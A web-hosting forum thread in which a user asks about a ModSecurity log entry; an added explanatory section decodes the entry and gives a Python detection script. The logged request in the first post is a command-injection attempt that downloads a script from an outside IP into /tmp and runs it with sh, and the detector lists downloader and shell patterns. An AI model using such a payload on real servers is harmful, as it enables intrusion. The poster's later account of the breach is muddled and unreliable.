Showing in cpanel under mod security connection to 127.0.0.1

Discussion in 'Security' started by xbat, Jun 22, 2018.

  1. #1
    Hello everyone!!

    Anyone have any input on this sort of stuff?
    GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

    I am seeing a lot of this in my mod security.. Was wondering if anyone had any input?? I tried a Google search but nothing is really coming up.. Suggestions on words to Google?
    Thank you
     
    xbat, Jun 22, 2018 IP
  2. hostechsupport
    #2
    It seems to be an attempt to hack your server through the /tmp folder.
     
    hostechsupport, Jul 5, 2018 IP
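
Percent-decoding the request from post #1 makes the /tmp staging mentioned in the reply above visible. The following is an added example, not code posted by anyone in this thread; the indicator names and patterns are assumptions made for illustration, and the two benign sample requests are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed input: line 1 is the request quoted in post #1, copied as logged
# (including its trailing "$"); lines 2-3 are made-up benign requests.
SAMPLE_REQUESTS = [
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$",
    "GET /index.php?page=contact&lang=en",
    "GET /search?q=wget%20manual",
]

# Hypothetical indicator names and patterns, chosen for this example.
INDICATORS = {
    "quote_break": re.compile(r"['\"`]"),                 # closes a quoted argument
    "cmd_separator": re.compile(r";|\||&&|\$\(|`"),       # chains another shell command
    "downloader": re.compile(r"\b(?:wget|curl|tftp)\b"),  # fetches a remote file
    "tmp_path": re.compile(r"/(?:var/)?tmp/|/dev/shm/"),  # world-writable staging dirs
    "shell_run": re.compile(r"\b(?:ba)?sh\s+/"),          # runs a file by path
}

def decode_params(request_line):
    """Split 'METHOD target' and return [(name, percent-decoded value)]."""
    target = request_line.split(" ", 2)[1]
    query = target.partition("?")[2]
    pairs = (p.partition("=") for p in query.split("&") if p)
    return [(name, unquote_plus(value)) for name, _, value in pairs]

def inspect(request_line):
    """Return (decoded params, sorted indicator hits, is_injection_attempt)."""
    params = decode_params(request_line)
    hits = sorted({name for _, value in params
                   for name, rx in INDICATORS.items() if rx.search(value)})
    # A bare word like "wget" in a search box is not enough: require a
    # command separator together with a download or an execution step.
    flagged = "cmd_separator" in hits and bool({"downloader", "shell_run"} & set(hits))
    return params, hits, flagged

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        params, hits, flagged = inspect(line)
        print("FLAG" if flagged else "ok  ", params, hits)
```

The decoded `cli` value reads `aa aa';wget http://185.62.190.191/r -O -> /tmp/r;sh /tmp/r'$`: a quote break, then a download written to /tmp/r, then a shell run of that file.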
  3. xbat
    #3
    I found it out. Turns out the PHP password wasn't protected... so the hackers crashed the MySQL connection and then the password would show. They would use the cross scripting to connect into MySQL and go from there. One of the top security firms in the world couldn't figure this out. I did after so long... But lots and lots of time spent looking in the wrong areas...
     
    xbat, Aug 6, 2018 IP